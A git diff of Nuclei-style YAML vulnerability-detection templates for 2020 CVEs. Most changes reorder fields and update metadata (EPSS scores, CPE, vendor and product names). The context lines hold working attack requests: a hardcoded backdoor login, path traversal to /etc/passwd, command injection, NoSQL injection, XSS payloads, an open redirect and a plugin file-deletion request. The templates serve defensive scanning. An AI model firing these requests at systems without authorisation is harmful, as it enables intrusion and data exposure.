/?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 Host: {{Hostname}} - - | GET /ext-js/index.html HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index d838f6707c..39ecd7624c 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -16,11 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 - cpe: cpe:2.3:a:incomcms_project:incomcms:*:*:*:*:*:*:*:* - epss-score: 0.78911 + epss-score: 0.83522 + cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: incomcms_project + product: incomcms tags: cve,cve2020,incomcms,fileupload,intrusive http: @@ -36,12 +38,12 @@ http: {{randstr_2}} ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - - | GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index 6791adbb4e..aeefddef1b 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -15,10 +15,13 @@ info: cvss-score: 9.1 cve-id: CVE-2020-3187 cwe-id: CWE-22 - epss-score: 0.97309 - tags: cve,cve2020,cisco,packetstorm + epss-score: 0.97406 + cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: firepower_threat_defense + tags: cve,cve2020,cisco,packetstorm http: - method: GET @@ -28,10 +31,10 @@ http: matchers-condition: and matchers: - type: word + part: header words: - webvpn - Webvpn - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 052fe80ff6..3621417844 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -18,18 +18,21 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-3452 - cwe-id: CWE-20 - cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* - epss-score: 0.97563 - tags: lfi,kev,packetstorm,cve,cve2020,cisco + cwe-id: CWE-22,CWE-20 + epss-score: 0.97544 + cpe: cpe:2.3:a:cisco:adaptive_security_appliance:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: cisco + product: adaptive_security_appliance + tags: lfi,kev,packetstorm,cve,cve2020,cisco http: - method: GET path: - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" - "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" + matchers: - type: word words: diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 5a08351cf6..38c4a3d045 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -15,11 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35234 cwe-id: CWE-532 - cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:*:*:* - epss-score: 0.53008 - tags: cve,cve2020,wordpress,wp-plugin,smtp + epss-score: 0.4891 + cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: wp-ecommerce + product: easy_wp_smtp + tags: cve,cve2020,wordpress,wp-plugin,smtp http: - method: GET diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 914855b12d..af43bed792 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -14,25 +14,28 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35338 cwe-id: CWE-798 + epss-score: 0.04387 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* - epss-score: 0.04997 - tags: cve,cve2020,wmt,default-login metadata: max-request: 1 + vendor: mobileviewpoint + product: wireless_multiplex_terminal_playout_server + tags: cve,cve2020,wmt,default-login http: - method: GET path: - "{{BaseURL}}/server/" + headers: Authorization: "Basic OnBva29u" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "WMT Server playout" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 0e2e3809f9..bb733a54c5 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -15,12 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35476 cwe-id: CWE-78 + epss-score: 0.96298 cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* - epss-score: 0.78489 metadata: max-request: 1 verified: true shodan-query: html:"OpenTSDB" + vendor: opentsdb + product: opentsdb tags: cve,cve2020,opentsdb,rce,packetstorm http: @@ -30,7 +32,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index c0e155f294..9787df6907 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -10,40 +10,31 @@ info: - https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/ - https://wordpress.org/plugins/contact-form-7/#developers - https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/ + - https://contactform7.com/2020/12/17/contact-form-7-532/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2020-35489 cwe-id: CWE-434 - cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:*:*:* - epss-score: 0.90859 - tags: cve,cve2020,wordpress,wp-plugin,rce + epss-score: 0.92295 + cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: rocklobster + product: contact_form_7 + tags: cve,cve2020,wordpress,wp-plugin,rce http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - compare_versions(version, '< 5.3.2') - type: word part: body @@ -52,6 +43,19 @@ http: - '== Changelog ==' condition: and - - type: dsl - dsl: - - compare_versions(version, '< 5.3.2') + - type: status + status: + - 200 + + extractors: + - type: regex + name: version + group: 1 + regex: + - "(?m)Stable tag: ([0-9.]+)" + internal: true + + - type: regex + group: 1 + regex: + - "(?m)Stable tag: ([0-9.]+)" diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index ba80810853..e3c96601b3 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -13,12 +13,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-35580 - cwe-id: CWE-522 + cwe-id: CWE-22 + epss-score: 0.02161 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* - epss-score: 0.02178 - tags: cve,cve2020,lfi metadata: max-request: 1 + vendor: searchblox + product: searchblox + tags: cve,cve2020,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 760e355469..c9c15d6297 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35598 cwe-id: CWE-22 - cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:*:*:*:*:*:*:*:* - epss-score: 0.11187 - tags: acs,edb,seclists,cve,cve2020,lfi + epss-score: 0.10696 + cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: advanced_comment_system_project + product: advanced_comment_system + tags: acs,edb,seclists,cve,cve2020,lfi http: - method: GET @@ -27,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index d57440e8bc..2483d1dee1 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -15,10 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35713 cwe-id: CWE-78 - epss-score: 0.97287 - tags: cve,cve2020,linksys,rce,oast,router + epss-score: 0.97277 + cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: linksys + product: re6500_firmware + tags: cve,cve2020,linksys,rce,oast,router http: - raw: diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 0fc7b066d9..f2340851f3 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -15,16 +15,19 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35729 cwe-id: CWE-78 - cpe: cpe:2.3:a:klogserver:klog_server:*:*:*:*:*:*:*:* - epss-score: 0.95448 - tags: cve,cve2020,klog,rce + epss-score: 0.94817 + cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: klogserver + product: klog_server + tags: cve,cve2020,klog,rce http: - method: POST path: - "{{BaseURL}}/actions/authenticate.php" + body: 'user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" matchers: - type: word diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 7543c25797..23348da812 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35736 cwe-id: CWE-22 - cpe: cpe:2.3:a:liftoffsoftware:gateone:*:*:*:*:*:*:*:* epss-score: 0.01553 - tags: cve,cve2020,gateone,lfi + cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: liftoffsoftware + product: gateone + tags: cve,cve2020,gateone,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 0d145d5e40..e454ddacc3 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -15,11 +15,14 @@ info: cvss-score: 7.7 cve-id: CVE-2020-35749 cwe-id: CWE-22 - cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:*:*:* epss-score: 0.01796 - tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve + cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: presstigers + product: simple_board_job + tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve http: - raw: @@ -31,12 +34,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 72ba1d9252..9eecc11d60 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -16,11 +16,13 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35774 cwe-id: CWE-79 - cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* epss-score: 0.97219 - tags: cve,cve2020,xss,twitter-server + cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: twitter + product: twitter-server + tags: cve,cve2020,xss,twitter-server http: - method: GET @@ -34,11 +36,11 @@ http: words: - '' - - type: status - status: - - 200 - - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index cfe428ad71..4291dafffa 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -15,10 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-3580 cwe-id: CWE-79 - epss-score: 0.97346 - tags: cve,cve2020,xss,cisco,kev + epss-score: 0.97233 + cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: firepower_threat_defense + tags: cve,cve2020,xss,cisco,kev http: - raw: @@ -32,15 +35,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index c00f5883b9..a728d77cef 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -10,23 +10,25 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-35846 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 + epss-score: 0.84079 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.78273 - tags: cve,cve2020,nosqli,sqli,cockpit,injection metadata: max-request: 1 + vendor: agentejo + product: cockpit + tags: cve,cve2020,nosqli,sqli,cockpit,injection http: - method: POST path: - "{{BaseURL}}/auth/check" - headers: - Content-Type: application/json + body: | { "auth": { @@ -39,12 +41,16 @@ http: } } + headers: + Content-Type: application/json + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - "password_verify() expects parameter" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 802b2a9832..b0282c3e01 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -11,17 +11,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-35847 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 + epss-score: 0.78648 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.80883 metadata: max-request: 2 shodan-query: http.favicon.hash:688609340 verified: true + vendor: agentejo + product: cockpit tags: cve,cve2020,nosqli,sqli,cockpit,injection http: @@ -36,7 +39,6 @@ http: "$func": "var_dump" } } - - | POST /auth/requestreset HTTP/1.1 Host: {{Hostname}} @@ -57,12 +59,12 @@ http: - type: regex part: body_1 + negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"' - negative: true - type: regex part: body_2 + negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' - negative: true diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 131300459e..09503cef4d 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -10,23 +10,25 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-35848 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 + epss-score: 0.80376 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.72481 - tags: cve,cve2020,nosqli,sqli,cockpit,injection metadata: max-request: 1 + vendor: agentejo + product: cockpit + tags: cve,cve2020,nosqli,sqli,cockpit,injection http: - method: POST path: - "{{BaseURL}}/auth/newpassword" - headers: - Content-Type: application/json + body: | { "token": { @@ -34,6 +36,8 @@ http: } } + headers: + Content-Type: application/json matchers: - type: regex part: body diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index a76e1980d1..870b298806 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -14,22 +14,23 @@ info: cvss-score: 9.9 cve-id: CVE-2020-35951 cwe-id: CWE-306 - cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:*:*:* - epss-score: 0.00217 - tags: cve2020,wordpress,wp-plugin,wpscan,cve + epss-score: 0.00189 + cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 + framework: wordpress + vendor: expresstech + product: quiz_and_survey_master + tags: cve2020,wordpress,wp-plugin,wpscan,cve,intrusive http: - raw: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} @@ -45,29 +46,28 @@ http: {{fullpath}}wp-content/plugins/quiz-master-next/README.md ------WebKitFormBoundaryBJ17hSJBjuGrnW92-- - - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} + req-condition: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master') + + - type: word + part: body + words: + - '{"type":"success","message":"File removed successfully"}' + extractors: - type: regex name: fullpath - internal: true - part: body group: 1 regex: - - "not found in ([/a-z_]+)wp" - - req-condition: true - matchers-condition: and - matchers: - - - type: word - words: - - '{"type":"success","message":"File removed successfully"}' + - not found in ([/a-z_]+)wp + internal: true part: body - - - type: dsl - dsl: - - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 77ae78f15d..cd4c846922 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -15,10 +15,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35984 cwe-id: CWE-79 + epss-score: 0.00127 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 + vendor: rukovoditel + product: rukovoditel tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: @@ -26,14 +30,12 @@ http: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - - | POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index a64d205dcc..ac018b6657 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35985 cwe-id: CWE-79 + epss-score: 0.00127 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: max-request: 3 verified: true + vendor: rukovoditel + product: rukovoditel tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: @@ -25,14 +29,12 @@ http: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - - | POST /index.php?module=global_lists/lists&action=save HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index a532006a00..ca4c5cacca 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -15,10 +15,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35986 cwe-id: CWE-79 + epss-score: 0.00127 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 + vendor: rukovoditel + product: rukovoditel tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: @@ -26,14 +30,12 @@ http: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - - | POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 538054c542..20c0dc9894 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35987 cwe-id: CWE-79 + epss-score: 0.00127 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: max-request: 3 verified: true + vendor: rukovoditel + product: rukovoditel tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated http: @@ -25,14 +29,12 @@ http: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - - | POST /index.php?module=entities/&action=save HTTP/1.1 Host: {{Hostname}} @@ -54,7 +56,7 @@ http: extractors: - type: regex name: nonce - internal: true group: 1 regex: - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 50efbefc68..1752df2d3a 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-36112 cwe-id: CWE-89 - cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:*:*:*:*:*:*:*:* epss-score: 0.47622 - tags: cve,cve2020,sqli,cse,edb,tenable + cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cse_bookstore_project + product: cse_bookstore + tags: cve,cve2020,sqli,cse,edb,tenable http: - raw: diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index d49708d4e8..a585d37ff6 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -13,11 +13,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-36289 - cwe-id: CWE-200 - epss-score: 0.9733 + cwe-id: CWE-863 + epss-score: 0.97254 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: data_center tags: cve,cve2020,jira,atlassian,unauth http: @@ -27,6 +30,7 @@ http: - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index a821647b36..a8f6b49430 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -14,16 +14,17 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36365 cwe-id: CWE-601 - cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* epss-score: 0.00331 + cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:'content="Smartstore' + vendor: smartstore + product: smartstorenet tags: cve,cve2020,redirect,smartstore http: - method: GET - path: - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 887f692db1..ffc6e90988 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36510 cwe-id: CWE-79 - cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:*:*:* epss-score: 0.00119 + cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: "false" + framework: wordpress + vendor: codetipi + product: 15zine tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan http: diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 760e9a96d1..9dddbca03c 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -20,11 +20,13 @@ info: cvss-score: 8.2 cve-id: CVE-2020-4463 cwe-id: CWE-611 - cpe: cpe:2.3:a:ibm:maximo_asset_management:*:*:*:*:*:*:*:* - epss-score: 0.74371 + epss-score: 0.40093 + cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:-399298961 + vendor: ibm + product: maximo_asset_management tags: cve,cve2020,ibm,xxe,disclosure http: @@ -32,17 +34,18 @@ http: path: - "{{BaseURL}}/os/mxperson" - "{{BaseURL}}/meaweb/os/mxperson" + body: | + headers: - Content-Type: application/xml + Content-Type: "application/xml" matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index 2d958368eb..be7dcf8393 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 - cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:*:*:*:*:*:*:*:* - epss-score: 0.00311 + epss-score: 0.00383 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: phpgurukul + product: hospital_management_system_in_php tags: cve2020,hms,cms,xss,authenticated,edb,cve http: @@ -30,7 +32,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&submit=&submit= - - | POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1 Host: {{Hostname}} @@ -38,9 +39,10 @@ http: doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit= + cookie-reuse: true host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 078cb4f305..ea58fdeb3d 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -15,13 +15,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5192 